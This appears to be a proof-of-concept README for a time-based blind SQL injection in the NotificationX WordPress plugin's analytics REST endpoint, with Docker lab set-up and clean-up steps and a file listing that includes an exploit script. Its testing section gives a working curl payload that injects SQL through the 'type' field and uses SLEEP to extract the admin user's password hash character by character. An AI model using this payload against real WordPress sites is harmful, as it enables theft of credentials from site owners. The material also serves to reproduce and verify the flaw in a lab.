## Set-up
```
docker-compose up --build
```
## Clean up
```
docker-compose down
```
## Testing
```
Measure-Command {
curl.exe http://localhost/wp-json/notificationx/v1/analytics `
-Method Post `
-Body 'nx_id=1337&type=clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),1,1))=36,SLEEP(10),null)-- -'
}
```
[4.0K] /data/pocs/4da2aa162bd10492bd84d7a474dad79d7a1b48b7
├── [ 977] docker-compose.yml
├── [ 333] Dockerfile
├── [1.1K] exploit.py
└── [ 369] README.md
0 directories, 4 files